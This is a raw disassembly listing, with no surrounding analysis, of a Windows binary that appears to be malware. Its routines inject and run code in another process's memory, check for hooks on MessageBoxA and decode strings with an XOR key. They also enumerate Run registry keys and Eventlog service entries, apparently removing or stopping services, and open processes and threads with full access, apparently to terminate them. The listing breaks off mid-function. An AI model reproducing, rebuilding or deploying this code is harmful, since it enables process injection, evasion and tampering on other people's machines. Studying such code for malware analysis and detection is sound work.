		movsd
		push	40h
		push	3000h
		movsb
		push	6
		mov	ebx, eax
		xor	edi, edi
		push	edi
		lea	eax, [ebp+var_18]
		push	ebx
		mov	[ebp+var_10+3],	eax
		call	ds:dword_41E0BC	; VirtualAllocEx
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_41A2A1

loc_41A29D:				; CODE XREF: sub_41A258+58j
		xor	al, al
		jmp	short loc_41A2D4
; ---------------------------------------------------------------------------

loc_41A2A1:				; CODE XREF: sub_41A258+43j
		push	edi
		push	40h
		push	6
		push	esi
		push	ebx
		call	ds:dword_41E0C0	; VirtualProtectEx
		test	eax, eax
		jnz	short loc_41A29D
		mov	eax, [ebp+var_10]
		mov	[esi], eax
		mov	eax, [ebp+var_C]
		mov	[esi+4], eax
		call	esi	; send
		push	8000h
		push	edi
		push	esi
		push	ebx
		call	ds:dword_41E0C4	; VirtualFreeEx
		cmp	[ebp+var_13], 0D0h
		setnbe	al

loc_41A2D4:				; CODE XREF: sub_41A258+47j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_41A258	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A2E3	proc near		; CODE XREF: sub_41C7BA+24p

var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_A		= byte ptr -0Ah
var_9		= byte ptr -9
var_8		= byte ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	offset aMessageboxa_0 ;	"MessageBoxA"
		push	offset aUser32_dll ; "user32.dll"
		mov	[ebp+var_C], 55h
		mov	[ebp+var_B], 8Bh
		mov	[ebp+var_A], 0ECh
		mov	[ebp+var_9], 81h
		mov	[ebp+var_8], 0ECh
		call	ds:off_41E0E4
		push	eax
		call	ds:off_41E0E8
		push	5
		mov	esi, eax
		pop	ecx
		xor	eax, eax
		lea	edi, [ebp+var_C]
		repe cmpsb
		mov	ecx, [ebp+var_4]
		setz	al
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_41A2E3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A33D	proc near		; CODE XREF: sub_40177B+81p
					; sub_4019F3+81p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	edi
		push	[ebp+arg_0]
		xor	edi, edi
		push	edi
		push	esi
		call	sub_408130
		mov	eax, ebx
		add	esp, 0Ch
		lea	ecx, [eax+1]

loc_41A356:				; CODE XREF: sub_41A33D+1Ej
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41A356
		sub	eax, ecx
		jz	short loc_41A3C7
		mov	eax, [ebp+arg_0]
		dec	eax
		mov	[ebp+var_4], eax

loc_41A368:				; CODE XREF: sub_41A33D+88j
		mov	eax, offset aSsolbzvcofuwrk ; "SsOlbZVCofUWrKFh"
		lea	edx, [eax+1]

loc_41A370:				; CODE XREF: sub_41A33D+38j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A370
		sub	eax, edx
		jz	short loc_41A37D
		xor	eax, eax

loc_41A37D:				; CODE XREF: sub_41A33D+3Cj
		movsx	ecx, byte ptr [edi+ebx]
		movsx	eax, byte ptr aSsolbzvcofuwrk[eax] ; "SsOlbZVCofUWrKFh"
		xor	ecx, eax
		xor	ecx, 0B2h
		push	ecx
		push	esi
		push	offset dword_4218D0
		push	[ebp+var_4]
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41A3A8:				; CODE XREF: sub_41A33D+70j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41A3A8
		sub	eax, ecx
		mov	[eax+esi], dl
		mov	eax, ebx
		inc	edi
		lea	ecx, [eax+1]

loc_41A3BA:				; CODE XREF: sub_41A33D+82j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41A3BA
		sub	eax, ecx
		cmp	edi, eax
		jb	short loc_41A368

loc_41A3C7:				; CODE XREF: sub_41A33D+22j
		mov	eax, esi
		pop	edi
		leave
		retn
sub_41A33D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A3CC	proc near		; CODE XREF: sub_41A889+28p

var_3C		= byte ptr -3Ch
var_38		= dword	ptr -38h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= byte ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	2Ch
		push	offset dword_422F40
		call	__SEH_prolog4
		mov	edi, ds:dword_41E104
		call	edi	; GetTickCount
		mov	[ebp+var_20], eax
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		mov	esi, ds:off_41E028
		call	esi ; sub_4427F5
		test	eax, eax
		jnz	short loc_41A407

loc_41A3FC:				; CODE XREF: sub_41A3CC+61j
					; sub_41A3CC+8Aj ...
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		jmp	loc_41A49B
; ---------------------------------------------------------------------------

loc_41A407:				; CODE XREF: sub_41A3CC+2Ej
		cmp	[ebp+var_38], 1
		jz	loc_41A499
		jmp	short loc_41A441
; ---------------------------------------------------------------------------

loc_41A413:				; CODE XREF: sub_41A3CC+79j
		push	[ebp+var_24]
		call	ds:off_41E0F8
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		call	esi ; sub_4427F5
		test	eax, eax
		jz	short loc_41A3FC
		cmp	[ebp+var_38], 1
		jz	short loc_41A499
		call	edi	; GetTickCount
		sub	eax, [ebp+var_20]
		cmp	eax, 12Ch
		ja	short loc_41A45A

loc_41A441:				; CODE XREF: sub_41A3CC+45j
		cmp	[ebp+var_38], 3
		jz	short loc_41A413
		lea	eax, [ebp+var_3C]
		push	eax
		push	1
		push	ebx
		call	ds:off_41E01C
		test	eax, eax
		jz	short loc_41A3FC
		jmp	short loc_41A493
; ---------------------------------------------------------------------------

loc_41A45A:				; CODE XREF: sub_41A3CC+73j
					; sub_41A3CC+C5j
		mov	eax, 5B4h
		jmp	short loc_41A49B
; ---------------------------------------------------------------------------

loc_41A461:				; CODE XREF: sub_41A3CC+CBj
		push	[ebp+var_24]
		call	ds:off_41E0F8
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		call	esi ; sub_4427F5
		test	eax, eax
		jz	loc_41A3FC
		cmp	[ebp+var_38], 1
		jz	short loc_41A499
		call	edi	; GetTickCount
		sub	eax, [ebp+var_20]
		cmp	eax, 12Ch
		ja	short loc_41A45A

loc_41A493:				; CODE XREF: sub_41A3CC+8Cj
		cmp	[ebp+var_38], 1
		jnz	short loc_41A461

loc_41A499:				; CODE XREF: sub_41A3CC+3Fj
					; sub_41A3CC+67j ...
		xor	eax, eax

loc_41A49B:				; CODE XREF: sub_41A3CC+36j
					; sub_41A3CC+93j
		call	__SEH_epilog4
		retn
sub_41A3CC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A4A1	proc near		; CODE XREF: sub_41AB0C+2C7p
					; sub_41AB0C+36Ep

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		push	ebx
		push	esi
		push	edi
		push	10h
		pop	esi
		lea	eax, [ebp+var_10]
		push	eax
		push	[ebp+arg_4]
		xor	edi, edi
		push	edi
		mov	[ebp+var_8], esi
		call	ds:off_41E034
		test	eax, eax
		jnz	short loc_41A4C8

loc_41A4C4:				; CODE XREF: sub_41A4A1+5Fj
		xor	al, al
		jmp	short loc_41A539
; ---------------------------------------------------------------------------

loc_41A4C8:				; CODE XREF: sub_41A4A1+21j
		mov	eax, [ebp+var_10]
		mov	[ebp+var_2C], eax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_28], eax
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_20]
		push	eax
		push	esi
		mov	esi, ds:off_41E014
		lea	eax, [ebp+var_30]
		push	eax
		push	edi
		push	[ebp+arg_0]
		xor	ebx, ebx
		inc	ebx
		mov	[ebp+var_30], ebx
		mov	[ebp+var_24], edi
		call	esi ; sub_44A903
		mov	edi, ds:dword_41E0EC
		call	edi	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_41A4C4
		mov	eax, [ebp+var_10]
		mov	[ebp+var_1C], eax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_18], eax
		xor	eax, eax
		cmp	[ebp+arg_8], eax
		mov	[ebp+var_20], ebx
		jz	short loc_41A51E
		or	[ebp+var_14], 2
		jmp	short loc_41A522
; ---------------------------------------------------------------------------

loc_41A51E:				; CODE XREF: sub_41A4A1+75j
		and	[ebp+var_14], 0FFFFFFFDh

loc_41A522:				; CODE XREF: sub_41A4A1+7Bj
		push	eax
		push	eax
		push	[ebp+var_8]
		lea	ecx, [ebp+var_20]
		push	ecx
		push	eax
		push	[ebp+arg_0]
		call	esi ; sub_44A903
		call	edi	; RtlGetLastWin32Error
		neg	eax
		sbb	al, al
		inc	al

loc_41A539:				; CODE XREF: sub_41A4A1+25j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_41A4A1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A53E	proc near		; CODE XREF: sub_41AB0C+400p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		push	edi
		lea	eax, [ebp+var_8]
		push	eax
		push	[ebp+arg_8]
		xor	ebx, ebx
		push	[ebp+arg_C]
		mov	[ebp+var_8], ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_4288D0
		test	eax, eax
		jnz	short loc_41A575

loc_41A565:				; CODE XREF: sub_41A53E+70j
					; sub_41A53E+74j
		push	[ebp+arg_C]
		call	sub_403129
		pop	ecx
		pop	edi
		pop	esi
		mov	al, bl
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A575:				; CODE XREF: sub_41A53E+25j
		xor	eax, eax

loc_41A577:				; CODE XREF: sub_41A53E+6Cj
		and	[ebp+var_4], 0
		mov	edx, offset dword_427898

loc_41A580:				; CODE XREF: sub_41A53E+66j
		mov	esi, [ebp+arg_C]
		mov	ecx, [edx+80h]
		add	esi, eax
		mov	edi, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_41A5B0
		mov	ecx, 84h
		add	[ebp+var_4], ecx
		add	edx, ecx
		cmp	[ebp+var_4], 318h
		jb	short loc_41A580
		inc	eax
		cmp	eax, [ebp+var_8]
		jbe	short loc_41A577
		xor	bl, bl
		jmp	short loc_41A565
; ---------------------------------------------------------------------------

loc_41A5B0:				; CODE XREF: sub_41A53E+53j
		mov	bl, 1
		jmp	short loc_41A565
sub_41A53E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A5B4	proc near		; CODE XREF: sub_41AB0C+483p

var_1C		= dword	ptr -1Ch
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		mov	[ebp+var_1C], 1Ch
		call	dword_4288CC
		test	eax, eax
		jnz	short loc_41A5D6
		xor	al, al
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A5D6:				; CODE XREF: sub_41A5B4+1Cj
					; sub_41A5B4+55j
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+arg_0]
		jnz	short loc_41A5FA
		push	[ebp+var_14]
		push	0
		push	1F03FFh
		call	dword_4288E0
		push	eax
		call	ds:off_41E0D0
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41A60B

loc_41A5FA:				; CODE XREF: sub_41A5B4+28j
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		call	dword_4288F0
		test	eax, eax
		jnz	short loc_41A5D6

loc_41A60B:				; CODE XREF: sub_41A5B4+44j
		push	[ebp+arg_4]
		call	ds:off_41E0D8
		mov	al, 1
		leave
		retn
sub_41A5B4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A618	proc near		; CODE XREF: sub_41AB0C+3BDp

var_1C		= dword	ptr -1Ch
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		mov	[ebp+var_1C], 1Ch
		call	dword_4288CC
		test	eax, eax
		jnz	short loc_41A63A
		xor	al, al
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A63A:				; CODE XREF: sub_41A618+1Cj
					; sub_41A618+55j
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+arg_0]
		jnz	short loc_41A65E
		push	[ebp+var_14]
		push	0
		push	1F03FFh
		call	dword_4288E0
		push	eax
		call	ds:off_41E0D4
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41A66F

loc_41A65E:				; CODE XREF: sub_41A618+28j
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		call	dword_4288F0
		test	eax, eax
		jnz	short loc_41A63A

loc_41A66F:				; CODE XREF: sub_41A618+44j
		push	[ebp+arg_4]
		call	ds:off_41E0D8
		mov	al, 1
		leave
		retn
sub_41A618	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A67C	proc near		; CODE XREF: sub_41AB0C+3D4p

var_228		= dword	ptr -228h
var_214		= dword	ptr -214h
var_210		= dword	ptr -210h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 228h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	edi
		push	[ebp+arg_0]
		xor	ebx, ebx
		push	8
		call	dword_4288D4
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_41A6B5

loc_41A6A5:				; CODE XREF: sub_41A67C+53j
		xor	al, al

loc_41A6A7:				; CODE XREF: sub_41A67C+8Dj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A6B5:				; CODE XREF: sub_41A67C+27j
		lea	eax, [ebp+var_228]
		push	eax
		push	edi
		mov	[ebp+var_228], 224h
		call	dword_4288C8
		test	eax, eax
		jz	short loc_41A6A5

loc_41A6D1:				; CODE XREF: sub_41A67C+6Bj
		inc	ebx
		cmp	ebx, 1
		jz	short loc_41A6ED
		lea	eax, [ebp+var_228]
		push	eax
		push	edi
		call	dword_4288E4
		test	eax, eax
		jnz	short loc_41A6D1
		xor	bl, bl
		jmp	short loc_41A700
; ---------------------------------------------------------------------------

loc_41A6ED:				; CODE XREF: sub_41A67C+59j
		mov	eax, [ebp+var_214]
		mov	[esi], eax
		mov	eax, [ebp+var_210]
		mov	[esi+4], eax
		mov	bl, 1

loc_41A700:				; CODE XREF: sub_41A67C+6Fj
		push	edi
		call	ds:off_41E0D8
		mov	al, bl
		jmp	short loc_41A6A7
sub_41A67C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=1B4h


sub_41A70B	proc near		; CODE XREF: sub_41AAC1+2Dp

var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= dword	ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= dword	ptr -208h
var_204		= byte ptr -204h
var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-1B4h]
		sub	esp, 234h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+1B4h+var_4], eax
		mov	eax, [ebp+1B4h+arg_0]
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	0FFh
		mov	[ebp+1B4h+var_224], eax
		lea	eax, [ebp+1B4h+var_103]
		push	ebx
		push	eax
		mov	[ebp+1B4h+var_234], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_230], offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_22C], offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_228], offset aSoftwareMicr_8 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_104], bl
		call	sub_408130
		mov	esi, 100h
		add	esp, 0Ch
		mov	[ebp+1B4h+var_21C], esi
		mov	[ebp+1B4h+var_214], esi
		mov	[ebp+1B4h+var_20C], offset dword_42788C
		mov	[ebp+1B4h+var_220], 2

loc_41A784:				; CODE XREF: sub_41A70B+160j
		mov	[ebp+1B4h+var_208], ebx

loc_41A787:				; CODE XREF: sub_41A70B+153j
		mov	eax, [ebp+1B4h+var_208]
		mov	eax, [ebp+eax*4+1B4h+var_234]
		lea	ecx, [ebp+1B4h+var_210]
		push	ecx
		push	1
		push	ebx
		push	eax
		mov	eax, [ebp+1B4h+var_20C]
		push	dword ptr [eax]
		call	ds:off_41E02C
		test	eax, eax
		jnz	loc_41A84E
		lea	eax, [ebp+1B4h+var_214]
		push	eax
		lea	eax, [ebp+1B4h+var_204]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [ebp+1B4h+var_21C]
		push	eax
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		mov	[ebp+1B4h+var_218], ebx
		push	ebx
		jmp	short loc_41A83A
; ---------------------------------------------------------------------------

loc_41A7C4:				; CODE XREF: sub_41A70B+13Dj
		xor	edi, edi

loc_41A7C6:				; CODE XREF: sub_41A70B+10Cj
		mov	eax, [ebp+1B4h+var_224]
		lea	edx, [eax+1]

loc_41A7CC:				; CODE XREF: sub_41A70B+C6j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41A7CC
		sub	eax, edx
		push	eax
		push	[ebp+1B4h+var_224]
		lea	eax, [ebp+edi+1B4h+var_204]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41A805
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		mov	eax, [ebp+1B4h+var_208]
		push	[ebp+eax*4+1B4h+var_234]
		mov	eax, [ebp+1B4h+var_20C]
		push	dword ptr [eax]
		call	sub_417BB2
		add	esp, 0Ch

loc_41A805:				; CODE XREF: sub_41A70B+DDj
		lea	eax, [ebp+1B4h+var_204]
		inc	edi
		lea	edx, [eax+1]

loc_41A80C:				; CODE XREF: sub_41A70B+106j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41A80C
		sub	eax, edx
		cmp	edi, eax
		jbe	short loc_41A7C6
		inc	[ebp+1B4h+var_218]
		lea	eax, [ebp+1B4h+var_214]
		push	eax
		lea	eax, [ebp+1B4h+var_204]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [ebp+1B4h+var_21C]
		push	eax
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		push	[ebp+1B4h+var_218]
		mov	[ebp+1B4h+var_21C], esi
		mov	[ebp+1B4h+var_214], esi

loc_41A83A:				; CODE XREF: sub_41A70B+B7j
		push	[ebp+1B4h+var_210]
		call	ds:off_41E020
		cmp	eax, 103h
		jnz	loc_41A7C4

loc_41A84E:				; CODE XREF: sub_41A70B+98j
		push	[ebp+1B4h+var_210]
		call	ds:off_41E010
		inc	[ebp+1B4h+var_208]
		cmp	[ebp+1B4h+var_208], 4
		jb	loc_41A787
		add	[ebp+1B4h+var_20C], 4
		dec	[ebp+1B4h+var_220]
		jnz	loc_41A784
		mov	ecx, [ebp+1B4h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 1B4h
		leave
		retn
sub_41A70B	endp


; =============== S U B	R O U T	I N E =======================================



sub_41A889	proc near		; CODE XREF: sub_41A8D9+189p

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		push	edi
		push	0F003Fh
		push	0
		push	0
		call	ds:off_41E024
		push	0F01FFh
		push	[esp+10h+arg_0]
		mov	esi, eax
		push	esi
		call	ds:off_41E044
		mov	edi, eax
		mov	ebx, edi
		call	sub_41A3CC
		push	edi
		call	ds:off_41E03C
		test	eax, eax
		jz	short loc_41A8D5
		mov	bl, 1

loc_41A8C3:				; CODE XREF: sub_41A889+4Ej
		push	esi
		mov	esi, ds:off_41E040
		call	esi ; sub_4450D1
		push	edi
		call	esi ; sub_4450D1
		pop	edi
		pop	esi
		mov	al, bl
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_41A8D5:				; CODE XREF: sub_41A889+36j
		xor	bl, bl
		jmp	short loc_41A8C3
sub_41A889	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2C0h


sub_41A8D9	proc near		; CODE XREF: sub_41AAC1+35p
					; sub_41AAC1:loc_41AAFEp

var_340		= dword	ptr -340h
var_33C		= dword	ptr -33Ch
var_338		= dword	ptr -338h
var_334		= byte ptr -334h
var_234		= byte ptr -234h
var_233		= byte ptr -233h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_34		= byte ptr -34h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-2C0h]
		sub	esp, 340h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2C0h+var_4], eax
		push	esi
		mov	eax, [ebp+2C0h+arg_0]
		push	edi
		push	0Bh
		pop	ecx
		mov	esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
		lea	edi, [ebp+2C0h+var_34]
		rep movsd
		movsw
		mov	esi, 0FFh
		push	esi
		mov	[ebp+2C0h+var_340], eax
		xor	edi, edi
		lea	eax, [ebp+2C0h+var_233]
		push	edi
		push	eax
		mov	[ebp+2C0h+var_234], 0
		call	sub_408130
		push	esi
		lea	eax, [ebp+2C0h+var_133]
		push	edi
		push	eax
		mov	[ebp+2C0h+var_134], 0
		call	sub_408130
		add	esp, 18h
		lea	eax, [ebp+2C0h+var_33C]
		push	eax
		push	0F003Fh
		push	edi
		lea	eax, [ebp+2C0h+var_34]
		push	eax
		push	80000002h
		call	ds:off_41E02C
		test	eax, eax
		jnz	loc_41AAA1
		push	ebx
		mov	ebx, 100h
		push	ebx
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		push	edi
		push	[ebp+2C0h+var_33C]
		mov	[ebp+2C0h+var_338], edi
		call	ds:off_41E018
		cmp	eax, 103h
		jz	loc_41AAA0
		jmp	short loc_41A996
; ---------------------------------------------------------------------------

loc_41A991:				; CODE XREF: sub_41A8D9+1C1j
		mov	esi, 0FFh

loc_41A996:				; CODE XREF: sub_41A8D9+B6j
		push	ebx
		lea	eax, [ebp+2C0h+var_334]
		push	edi
		push	eax
		call	sub_408130
		push	ebx
		lea	eax, [ebp+2C0h+var_234]
		push	edi
		push	eax
		call	sub_408130
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		lea	eax, [ebp+2C0h+var_34]
		push	eax
		push	offset aSS_5	; "%s\\%s"
		lea	eax, [ebp+2C0h+var_234]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+2C0h+var_234]
		add	esp, 2Ch
		lea	esi, [eax+1]

loc_41A9DB:				; CODE XREF: sub_41A8D9+107j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A9DB
		sub	eax, esi
		mov	[ebp+eax+2C0h+var_234],	cl
		lea	eax, [ebp+2C0h+var_134]
		push	offset aLdm	; "LDM"
		push	eax
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41AA7E
		push	7
		mov	edi, offset aNetdde ; "NetDDE"
		lea	esi, [ebp+2C0h+var_134]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_41AA7C
		push	ebx
		lea	eax, [ebp+2C0h+var_334]
		push	eax
		push	offset aEventmessagefi ; "EventMessageFile"
		lea	eax, [ebp+2C0h+var_234]
		push	eax
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	short loc_41AA7C
		xor	esi, esi

loc_41AA37:				; CODE XREF: sub_41A8D9+1A1j
		mov	eax, [ebp+2C0h+var_340]
		lea	edx, [eax+1]

loc_41AA3D:				; CODE XREF: sub_41A8D9+169j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41AA3D
		sub	eax, edx
		push	eax
		push	[ebp+2C0h+var_340]
		lea	eax, [ebp+esi+2C0h+var_334]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41AA68
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		call	sub_41A889
		pop	ecx

loc_41AA68:				; CODE XREF: sub_41A8D9+180j
		lea	eax, [ebp+2C0h+var_334]
		inc	esi
		lea	edx, [eax+1]

loc_41AA6F:				; CODE XREF: sub_41A8D9+19Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41AA6F
		sub	eax, edx
		cmp	esi, eax
		jbe	short loc_41AA37

loc_41AA7C:				; CODE XREF: sub_41A8D9+13Bj
					; sub_41A8D9+15Aj
		xor	edi, edi

loc_41AA7E:				; CODE XREF: sub_41A8D9+127j
		inc	[ebp+2C0h+var_338]
		push	ebx
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		push	[ebp+2C0h+var_338]
		push	[ebp+2C0h+var_33C]
		call	ds:off_41E018
		cmp	eax, 103h
		jnz	loc_41A991

loc_41AAA0:				; CODE XREF: sub_41A8D9+B0j
		pop	ebx

loc_41AAA1:				; CODE XREF: sub_41A8D9+8Aj
		push	[ebp+2C0h+var_33C]
		call	ds:off_41E010
		mov	ecx, [ebp+2C0h+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		add	ebp, 2C0h
		leave
		retn
sub_41A8D9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AAC1	proc near		; CODE XREF: sub_41AB0C+42Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		call	ds:off_41E0F4
		test	eax, eax
		jz	short loc_41AB08
		push	7D0h
		call	ds:off_41E0F8
		push	[ebp+arg_4]
		call	ds:off_41E0CC
		test	eax, eax
		push	[ebp+arg_8]
		jz	short loc_41AAFE
		call	sub_41A70B
		push	[ebp+arg_8]
		call	sub_41A8D9
		pop	ecx
		jmp	short loc_41AB03
; ---------------------------------------------------------------------------

loc_41AAFE:				; CODE XREF: sub_41AAC1+2Bj
		call	sub_41A8D9

loc_41AB03:				; CODE XREF: sub_41AAC1+3Bj
		pop	ecx
		mov	al, 1
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_41AB08:				; CODE XREF: sub_41AAC1+10j
		xor	al, al
		pop	ebp
		retn
sub_41AAC1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AB0C	proc near		; DATA XREF: sub_41C7BA+354o

var_569		= byte ptr -569h
var_568		= dword	ptr -568h
var_564		= dword	ptr -564h
var_560		= dword	ptr -560h
var_55C		= dword	ptr -55Ch
var_558		= dword	ptr -558h
var_554		= dword	ptr -554h
var_550		= dword	ptr -550h
var_54C		= dword	ptr -54Ch
var_548		= dword	ptr -548h
var_540		= dword	ptr -540h
var_524		= byte ptr -524h
var_420		= byte ptr -420h
var_318		= byte ptr -318h
var_317		= byte ptr -317h
var_210		= byte ptr -210h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 56Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+56Ch+var_4], eax
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	103h
		lea	eax, [esp+57Ch+var_317]
		push	ebx
		push	eax
		mov	[esp+584h+var_318], bl
		call	sub_408130
		add	esp, 0Ch
		mov	[esp+578h+var_558], offset dword_4218E8
		mov	[esp+578h+var_554], offset dword_4218F8
		mov	[esp+578h+var_550], offset dword_421904
		call	sub_403076	; GetCurrentProcessId
		mov	edi, ds:dword_41E0E0
		push	offset aOpenthread ; "OpenThread"
